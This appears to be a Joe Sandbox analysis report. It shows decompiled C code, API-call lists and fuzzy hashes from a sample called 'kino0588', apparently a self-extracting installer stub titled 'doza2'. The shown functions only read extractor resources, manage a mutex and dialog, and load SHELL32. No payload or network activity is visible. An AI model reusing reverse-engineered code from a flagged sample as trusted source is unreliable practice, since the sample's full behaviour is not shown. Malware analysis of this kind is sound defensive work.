                                                                                                                                                                                                                                    0x001932fc
                                                                                                                                                                                                                                    0x00193301
                                                                                                                                                                                                                                    0x00193301
                                                                                                                                                                                                                                    0x00193303
                                                                                                                                                                                                                                    0x00193304
                                                                                                                                                                                                                                    0x00193304
                                                                                                                                                                                                                                    0x0019330a
                                                                                                                                                                                                                                    0x0019330d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193313
                                                                                                                                                                                                                                    0x00193318
                                                                                                                                                                                                                                    0x0019331a
                                                                                                                                                                                                                                    0x00193331
                                                                                                                                                                                                                                    0x00193332
                                                                                                                                                                                                                                    0x0019333a
                                                                                                                                                                                                                                    0x0019333d
                                                                                                                                                                                                                                    0x0019337c
                                                                                                                                                                                                                                    0x00193388
                                                                                                                                                                                                                                    0x0019338f
                                                                                                                                                                                                                                    0x00193394
                                                                                                                                                                                                                                    0x00193396
                                                                                                                                                                                                                                    0x001933a4
                                                                                                                                                                                                                                    0x001933ab
                                                                                                                                                                                                                                    0x001933b6
                                                                                                                                                                                                                                    0x001933be
                                                                                                                                                                                                                                    0x001933c3
                                                                                                                                                                                                                                    0x001933c5
                                                                                                                                                                                                                                    0x00193435
                                                                                                                                                                                                                                    0x00193437
                                                                                                                                                                                                                                    0x00193437
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193437
                                                                                                                                                                                                                                    0x001933c7
                                                                                                                                                                                                                                    0x001933c9
                                                                                                                                                                                                                                    0x001933cc
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001933cc
                                                                                                                                                                                                                                    0x001933ad
                                                                                                                                                                                                                                    0x001933b4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001933b4
                                                                                                                                                                                                                                    0x00193398
                                                                                                                                                                                                                                    0x00193399
                                                                                                                                                                                                                                    0x0019339b
                                                                                                                                                                                                                                    0x0019339c
                                                                                                                                                                                                                                    0x0019339d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019339d
                                                                                                                                                                                                                                    0x0019334c
                                                                                                                                                                                                                                    0x00193351
                                                                                                                                                                                                                                    0x00193354
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019335c
                                                                                                                                                                                                                                    0x00193362
                                                                                                                                                                                                                                    0x00193364
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193366
                                                                                                                                                                                                                                    0x00193367
                                                                                                                                                                                                                                    0x00193369
                                                                                                                                                                                                                                    0x0019336a
                                                                                                                                                                                                                                    0x0019336b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019336b
                                                                                                                                                                                                                                    0x0019331c
                                                                                                                                                                                                                                    0x00193323
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193329
                                                                                                                                                                                                                                    0x0019332b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019332b
                                                                                                                                                                                                                                    0x0019324c
                                                                                                                                                                                                                                    0x0019324c
                                                                                                                                                                                                                                    0x0019324f
                                                                                                                                                                                                                                    0x001932c8
                                                                                                                                                                                                                                    0x001932ce
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001932ce
                                                                                                                                                                                                                                    0x00193251
                                                                                                                                                                                                                                    0x00193256
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193271
                                                                                                                                                                                                                                    0x00193277
                                                                                                                                                                                                                                    0x00193279
                                                                                                                                                                                                                                    0x00193298
                                                                                                                                                                                                                                    0x0019329d
                                                                                                                                                                                                                                    0x0019329f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001932b0
                                                                                                                                                                                                                                    0x001932b6
                                                                                                                                                                                                                                    0x001932b8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001932be
                                                                                                                                                                                                                                    0x00193280
                                                                                                                                                                                                                                    0x00193289
                                                                                                                                                                                                                                    0x0019328e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019328e
                                                                                                                                                                                                                                    0x0019327b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019327b
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadStringA.USER32(000003E8,00198598,00000200), ref: 00193271
                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 001933E2
                                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,doza2), ref: 001933F7
                                                                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00193410
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000836), ref: 00193426
                                                                                                                                                                                                                                    • EnableWindow.USER32(00000000), ref: 0019342D
                                                                                                                                                                                                                                    • EndDialog.USER32(?,00000000), ref: 0019343F
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$doza2
                                                                                                                                                                                                                                    • API String ID: 2418873061-4002867030
                                                                                                                                                                                                                                    • Opcode ID: cb30d6cab0159201cdd4d8f8a0eda667b9eb8e284a94671fc8fc86306a082a98
                                                                                                                                                                                                                                    • Instruction ID: f9c896cc18d706eee3475f4cecbfe0fe6369401eb5556533b4a14f7ce364d57d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb30d6cab0159201cdd4d8f8a0eda667b9eb8e284a94671fc8fc86306a082a98
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A95167303802407BEF261B395C8CF7B2A5DEF96B54F504039F226E75D0CBA48F4692A2
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00192CAA Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183synchronizationCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                                                    			E00192CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t20;
				void* _t23;
				void* _t27;
				struct HRSRC__* _t31;
				intOrPtr _t33;
				void* _t43;
				void* _t48;
				signed int _t65;
				struct HINSTANCE__* _t66;
				signed int _t67;

				_t13 =  *0x198004; // 0x21bd9a3c
				_v8 = _t13 ^ _t67;
				_t65 = 0;
				_t66 = __ecx;
				_t48 = __edx;
				 *0x199a3c = __ecx;
				memset(0x199140, 0, 0x8fc);
				memset(0x198a20, 0, 0x32c);
				memset(0x1988c0, 0, 0x104);
				 *0x1993ec = 1;
				_t20 = E0019468F("TITLE", 0x199154, 0x7f);
				if(_t20 == 0 || _t20 > 0x80) {
					_t64 = 0x4b1;
					goto L32;
				} else {
					_t27 = CreateEventA(0, 1, 1, 0);
					 *0x19858c = _t27;
					SetEvent(_t27);
					_t64 = 0x199a34;
					if(E0019468F("EXTRACTOPT", 0x199a34, 4) != 0) {
						if(( *0x199a34 & 0x000000c0) == 0) {
							L12:
							 *0x199120 =  *0x199120 & _t65;
							if(E00195C9E(_t48, _t48, _t65, _t66) != 0) {
								if( *0x198a3a == 0) {
									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
									if(_t31 != 0) {
										_t65 = LoadResource(_t66, _t31);
									}
									if( *0x198184 != 0) {
										__imp__#17();
									}
									if( *0x198a24 == 0) {
										_t57 = _t65;
										if(E001936EE(_t65) == 0) {
											goto L33;
										} else {
											_t33 =  *0x199a40; // 0x3
											_t48 = 1;
											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
												if(( *0x199a34 & 0x00000100) == 0 || ( *0x198a38 & 0x00000001) != 0 || E001918A3(_t64, _t66) != 0) {
													goto L30;
												} else {
													_t64 = 0x7d6;
													if(E00196517(_t57, 0x7d6, _t34, E001919E0, 0x547, 0x83e) != 0x83d) {
														goto L33;
													} else {
														goto L30;
													}
												}
											} else {
												L30:
												_t23 = _t48;
											}
										}
									} else {
										_t23 = 1;
									}
								} else {
									E00192390(0x198a3a);
									goto L33;
								}
							} else {
								_t64 = 0x520;
								L32:
								E001944B9(0, _t64, 0, 0, 0x10, 0);
								goto L33;
							}
						} else {
							_t64 =  &_v268;
							if(E0019468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
								goto L3;
							} else {
								_t43 = CreateMutexA(0, 1,  &_v268);
								 *0x198588 = _t43;
								if(_t43 == 0 || GetLastError() != 0xb7) {
									goto L12;
								} else {
									if(( *0x199a34 & 0x00000080) == 0) {
										_t64 = 0x524;
										if(E001944B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
											goto L12;
										} else {
											goto L11;
										}
									} else {
										_t64 = 0x54b;
										E001944B9(0, 0x54b, "doza2", 0, 0x10, 0);
										L11:
										CloseHandle( *0x198588);
										 *0x199124 = 0x800700b7;
										goto L33;
									}
								}
							}
						}
					} else {
						L3:
						_t64 = 0x4b1;
						E001944B9(0, 0x4b1, 0, 0, 0x10, 0);
						 *0x199124 = 0x80070714;
						L33:
						_t23 = 0;
					}
				}
				return E00196CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
			}



















                                                                                                                                                                                                                                    0x00192cb5
                                                                                                                                                                                                                                    0x00192cbc
                                                                                                                                                                                                                                    0x00192cc7
                                                                                                                                                                                                                                    0x00192cc9
                                                                                                                                                                                                                                    0x00192cd1
                                                                                                                                                                                                                                    0x00192cd3
                                                                                                                                                                                                                                    0x00192cd9
                                                                                                                                                                                                                                    0x00192ce9
                                                                                                                                                                                                                                    0x00192cf9
                                                                                                                                                                                                                                    0x00192d0e
                                                                                                                                                                                                                                    0x00192d15
                                                                                                                                                                                                                                    0x00192d1c
                                                                                                                                                                                                                                    0x00192ef3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00192d2d
                                                                                                                                                                                                                                    0x00192d34
                                                                                                                                                                                                                                    0x00192d3b
                                                                                                                                                                                                                                    0x00192d40
                                                                                                                                                                                                                                    0x00192d48
                                                                                                                                                                                                                                    0x00192d59
                                                                                                                                                                                                                                    0x00192d84
                                                                                                                                                                                                                                    0x00192e1f
                                                                                                                                                                                                                                    0x00192e1f
                                                                                                                                                                                                                                    0x00192e2e
                                                                                                                                                                                                                                    0x00192e41
                                                                                                                                                                                                                                    0x00192e5a
                                                                                                                                                                                                                                    0x00192e62
                                                                                                                                                                                                                                    0x00192e6c
                                                                                                                                                                                                                                    0x00192e6c
                                                                                                                                                                                                                                    0x00192e75
                                                                                                                                                                                                                                    0x00192e77
                                                                                                                                                                                                                                    0x00192e77
                                                                                                                                                                                                                                    0x00192e84
                                                                                                                                                                                                                                    0x00192e8b
                                                                                                                                                                                                                                    0x00192e94
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00192e96
                                                                                                                                                                                                                                    0x00192e96
                                                                                                                                                                                                                                    0x00192e9e
                                                                                                                                                                                                                                    0x00192ea2
                                                                                                                                                                                                                                    0x00192eba
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00192ece
                                                                                                                                                                                                                                    0x00192ede
                                                                                                                                                                                                                                    0x00192eed
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00192eed
                                                                                                                                                                                                                                    0x00192eef
                                                                                                                                                                                                                                    0x00192eef
                                                                                                                                                                                                                                    0x00192eef
                                                                                                                                                                                                                                    0x00192eef
                                                                                                                                                                                                                                    0x00192ea2
                                                                                                                                                                                                                                    0x00192e86
                                                                                                                                                                                                                                    0x00192e88
                                                                                                                                                                                                                                    0x00192e88
                                                                                                                                                                                                                                    0x00192e43
                                                                                                                                                                                                                                    0x00192e48
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00192e48
                                                                                                                                                                                                                                    0x00192e30
                                                                                                                                                                                                                                    0x00192e30
                                                                                                                                                                                                                                    0x00192ef8
                                                                                                                                                                                                                                    0x00192f01
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00192f01
                                                                                                                                                                                                                                    0x00192d8a
                                                                                                                                                                                                                                    0x00192d8f
                                                                                                                                                                                                                                    0x00192da1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00192da3
                                                                                                                                                                                                                                    0x00192dae
                                                                                                                                                                                                                                    0x00192db4
                                                                                                                                                                                                                                    0x00192dbb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00192dca
                                                                                                                                                                                                                                    0x00192dd3
                                                                                                                                                                                                                                    0x00192df5
                                                                                                                                                                                                                                    0x00192e02
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00192dd5
                                                                                                                                                                                                                                    0x00192dde
                                                                                                                                                                                                                                    0x00192de3
                                                                                                                                                                                                                                    0x00192e04
                                                                                                                                                                                                                                    0x00192e0a
                                                                                                                                                                                                                                    0x00192e10
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00192e10
                                                                                                                                                                                                                                    0x00192dd3
                                                                                                                                                                                                                                    0x00192dbb
                                                                                                                                                                                                                                    0x00192da1
                                                                                                                                                                                                                                    0x00192d5b
                                                                                                                                                                                                                                    0x00192d5b
                                                                                                                                                                                                                                    0x00192d5d
                                                                                                                                                                                                                                    0x00192d69
                                                                                                                                                                                                                                    0x00192d6e
                                                                                                                                                                                                                                    0x00192f06
                                                                                                                                                                                                                                    0x00192f06
                                                                                                                                                                                                                                    0x00192f06
                                                                                                                                                                                                                                    0x00192d59
                                                                                                                                                                                                                                    0x00192f18

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00192CD9
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00192CE9
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00192CF9
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001946A0
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: SizeofResource.KERNEL32(00000000,00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946A9
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001946C3
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: LoadResource.KERNEL32(00000000,00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946CC
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: LockResource.KERNEL32(00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946D3
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: memcpy_s.MSVCRT ref: 001946E5
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001946EF
                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00192D34
                                                                                                                                                                                                                                    • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00192D40
                                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00192DAE
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00192DBD
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(doza2,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00192E0A
                                                                                                                                                                                                                                      • Part of subcall function 001944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00194518
                                                                                                                                                                                                                                      • Part of subcall function 001944B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00194554
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                                                    • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$doza2
                                                                                                                                                                                                                                    • API String ID: 1002816675-859929227
                                                                                                                                                                                                                                    • Opcode ID: 688e5e5f881a1c526ff0cb572b7ee54ab47fbbd4f85a20b98fcee1dc4972acd9
                                                                                                                                                                                                                                    • Instruction ID: 5c59c6445728df3b7b9b6c77d87410fa6f744c13bfd0e360f8d4c6f30e9c635e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 688e5e5f881a1c526ff0cb572b7ee54ab47fbbd4f85a20b98fcee1dc4972acd9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10511670340301BBEF24AB389D8AF7B3698EB55710F14403AF941D69E1EBB89CC1C666
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 001934F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119threadwindowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 81%
                                                                                                                                                                                                                                    			E001934F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t9;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t23;
				void* _t25;
				struct HWND__* _t35;
				struct HWND__* _t38;
				void* _t39;

				_t9 = _a8 - 0x10;
				if(_t9 == 0) {
					__eflags = 1;
					L19:
					_push(0);
					 *0x1991d8 = 1;
					L20:
					_push(_a4);
					L21:
					EndDialog();
					L22:
					return 1;
				}
				_push(1);
				_pop(1);
				_t12 = _t9 - 0xf2;
				if(_t12 == 0) {
					__eflags = _a12 - 0x1b;
					if(_a12 != 0x1b) {
						goto L22;
					}
					goto L19;
				}
				_t13 = _t12 - 0xe;
				if(_t13 == 0) {
					_t35 = _a4;
					 *0x198584 = _t35;
					E001943D0(_t35, GetDesktopWindow());
					__eflags =  *0x198184; // 0x1
					if(__eflags != 0) {
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
					}
					SetWindowTextA(_t35, "doza2");
					_t17 = CreateThread(0, 0, E00194FE0, 0, 0, 0x198798);
					 *0x19879c = _t17;
					__eflags = _t17;
					if(_t17 != 0) {
						goto L22;
					} else {
						E001944B9(_t35, 0x4b8, 0, 0, 0x10, 0);
						_push(0);
						_push(_t35);
						goto L21;
					}
				}
				_t23 = _t13 - 1;
				if(_t23 == 0) {
					__eflags = _a12 - 2;
					if(_a12 != 2) {
						goto L22;
					}
					ResetEvent( *0x19858c);
					_t38 =  *0x198584; // 0x0
					_t25 = E001944B9(_t38, 0x4b2, 0x191140, 0, 0x20, 4);
					__eflags = _t25 - 6;
					if(_t25 == 6) {
						L11:
						 *0x1991d8 = 1;
						SetEvent( *0x19858c);
						_t39 =  *0x19879c; // 0x0
						E00193680(_t39);
						_push(0);
						goto L20;
					}
					__eflags = _t25 - 1;
					if(_t25 == 1) {
						goto L11;
					}
					SetEvent( *0x19858c);
					goto L22;
				}
				if(_t23 == 0xe90) {
					TerminateThread( *0x19879c, 0);
					EndDialog(_a4, _a12);
					return 1;
				}
				return 0;
			}












                                                                                                                                                                                                                                    0x001934fb
                                                                                                                                                                                                                                    0x001934fe
                                                                                                                                                                                                                                    0x00193665
                                                                                                                                                                                                                                    0x00193666
                                                                                                                                                                                                                                    0x00193666
                                                                                                                                                                                                                                    0x00193668
                                                                                                                                                                                                                                    0x0019366e
                                                                                                                                                                                                                                    0x0019366e
                                                                                                                                                                                                                                    0x00193671
                                                                                                                                                                                                                                    0x00193671
                                                                                                                                                                                                                                    0x00193677
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193677
                                                                                                                                                                                                                                    0x00193504
                                                                                                                                                                                                                                    0x00193506
                                                                                                                                                                                                                                    0x00193507
                                                                                                                                                                                                                                    0x0019350c
                                                                                                                                                                                                                                    0x0019365b
                                                                                                                                                                                                                                    0x0019365f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193661
                                                                                                                                                                                                                                    0x00193512
                                                                                                                                                                                                                                    0x00193515
                                                                                                                                                                                                                                    0x001935be
                                                                                                                                                                                                                                    0x001935c1
                                                                                                                                                                                                                                    0x001935d1
                                                                                                                                                                                                                                    0x001935d8
                                                                                                                                                                                                                                    0x001935de
                                                                                                                                                                                                                                    0x001935f8
                                                                                                                                                                                                                                    0x00193617
                                                                                                                                                                                                                                    0x00193617
                                                                                                                                                                                                                                    0x00193623
                                                                                                                                                                                                                                    0x00193637
                                                                                                                                                                                                                                    0x0019363d
                                                                                                                                                                                                                                    0x00193642
                                                                                                                                                                                                                                    0x00193644
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193646
                                                                                                                                                                                                                                    0x00193652
                                                                                                                                                                                                                                    0x00193657
                                                                                                                                                                                                                                    0x00193658
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193658
                                                                                                                                                                                                                                    0x00193644
                                                                                                                                                                                                                                    0x0019351b
                                                                                                                                                                                                                                    0x0019351d
                                                                                                                                                                                                                                    0x0019354f
                                                                                                                                                                                                                                    0x00193553
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019355f
                                                                                                                                                                                                                                    0x00193565
                                                                                                                                                                                                                                    0x0019357c
                                                                                                                                                                                                                                    0x00193581
                                                                                                                                                                                                                                    0x00193584
                                                                                                                                                                                                                                    0x0019359b
                                                                                                                                                                                                                                    0x001935a1
                                                                                                                                                                                                                                    0x001935a7
                                                                                                                                                                                                                                    0x001935ad
                                                                                                                                                                                                                                    0x001935b3
                                                                                                                                                                                                                                    0x001935b8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001935b8
                                                                                                                                                                                                                                    0x00193586
                                                                                                                                                                                                                                    0x00193588
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193590
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193590
                                                                                                                                                                                                                                    0x00193524
                                                                                                                                                                                                                                    0x00193535
                                                                                                                                                                                                                                    0x00193541
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193549
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000000), ref: 00193535
                                                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 00193541
                                                                                                                                                                                                                                    • ResetEvent.KERNEL32 ref: 0019355F
                                                                                                                                                                                                                                    • SetEvent.KERNEL32(00191140,00000000,00000020,00000004), ref: 00193590
                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 001935C7
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000083B), ref: 001935F1
                                                                                                                                                                                                                                    • SendMessageA.USER32(00000000), ref: 001935F8
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000083B), ref: 00193610
                                                                                                                                                                                                                                    • SendMessageA.USER32(00000000), ref: 00193617
                                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,doza2), ref: 00193623
                                                                                                                                                                                                                                    • CreateThread.KERNEL32 ref: 00193637
                                                                                                                                                                                                                                    • EndDialog.USER32(?,00000000), ref: 00193671
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                                                    • String ID: doza2
                                                                                                                                                                                                                                    • API String ID: 2406144884-612509477
                                                                                                                                                                                                                                    • Opcode ID: 89ce496cc69eb1c1cd2bfb76ea3e3b6be8f29c2e10c27c99063fb4b020cf96ad
                                                                                                                                                                                                                                    • Instruction ID: 98c7c1614ea2c074c481f7981f08ada039016d559c5cde98e4aad797448495a2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 89ce496cc69eb1c1cd2bfb76ea3e3b6be8f29c2e10c27c99063fb4b020cf96ad
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E310870240301BBEF201F34EC0DE2B3A69FB8AB00F51452BF622956F0CB718A84CB95
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00194224 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132libraryloaderCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                                                                                                    			E00194224(char __ecx) {
				char* _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				_Unknown_base(*)()* _v20;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				_Unknown_base(*)()* _t26;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t32;
				char _t42;
				char* _t44;
				char* _t61;
				void* _t63;
				char* _t65;
				struct HINSTANCE__* _t66;
				char _t67;
				void* _t71;
				char _t76;
				intOrPtr _t85;

				_t67 = __ecx;
				_t66 = LoadLibraryA("SHELL32.DLL");
				if(_t66 == 0) {
					_t63 = 0x4c2;
					L22:
					E001944B9(_t67, _t63, 0, 0, 0x10, 0);
					return 0;
				}
				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
				_v12 = _t26;
				if(_t26 == 0) {
					L20:
					FreeLibrary(_t66);
					_t63 = 0x4c1;
					goto L22;
				}
				_t28 = GetProcAddress(_t66, 0xc3);
				_v20 = _t28;
				if(_t28 == 0) {
					goto L20;
				}
